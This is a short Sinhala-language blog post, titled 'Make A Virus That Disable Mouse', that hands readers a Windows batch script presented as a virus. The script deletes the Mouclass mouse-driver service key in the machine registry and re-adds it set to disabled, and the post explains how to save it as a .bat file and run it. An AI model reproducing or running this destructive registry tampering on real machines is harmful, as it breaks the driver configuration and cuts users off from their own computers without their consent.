Make A Virus That Disable Mouse

කොහොමද යාලුවනේ , බලන්නකෝ අද අරගෙන අවේ මොකද්ද කියලා.ඔයාගේ computer එකේ mouse එක disable කරන විදිහක් දන තමා මම අද අරගෙන අවේ,.මේක virus ක් තමා..අපිට normally port වලින් disable කරන්න ත් පුළුවන් නමුත් mouse ක් ? කොහොමද ?disable-mouse-keyboard-icon1

මම දෙන්නම් code ක්.එක කෙලින්ම Attach කරන්නේ computer eke Registry වලට..එතනින් තමා mouse එක disable වෙන්නේ..මේක virus ක් විදිහට තමා ක්‍රියාත්මක වෙන්නේ.මේක තමා code එක.

rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

file එක හදාගන්න විදිහත් ඉතින් මම සුපුරුදු පරිදි කියන්නම්කො ඔයාලට ,.notepad එකේ ඕක copy කරලා අරගෙන save as ගිහිල්ලා file name එකට xxxxxxx.bat දීල save as type එකට all දීල save කරන්නකෝ..මෙහෙම තමා file එක හදාගන්නේ..දැන් ඉතින් run කරලා බලන්නේ කොහොමද කියල මම අමුතුවෙන් කියන්න ඕනේ නැහැ නේද? virtual machine එකක තමා වැඩේ කරන්න වෙන්නේ…හරි අහෙනම් අදට හරි…සුබ දවසක් වේවා ඔයගොල්ලන්ට,,, Like ක් දාලා share පාරක් එහෙම දාගෙන යන්නකෝ යාලුවනේ අනිත් අයටත් දැනගන්නම..

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s